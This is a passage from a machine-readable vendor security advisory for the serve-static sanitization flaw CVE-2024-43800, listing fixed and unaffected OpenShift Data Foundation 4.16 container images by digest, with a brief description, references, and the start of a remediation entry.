"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311154"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "serve-static: Improper Sanitization in serve-static",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64"
],
"known_not_affected": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43800"
},
{
"category": "external",
"summary": "RHBZ#2311154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311154"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43800",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43800"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b",
"url": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa",
"url": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p",
"url": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p"
}
],
"release_date": "2024-09-10T15:15:17.937000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-15T08:52:38+00:00",
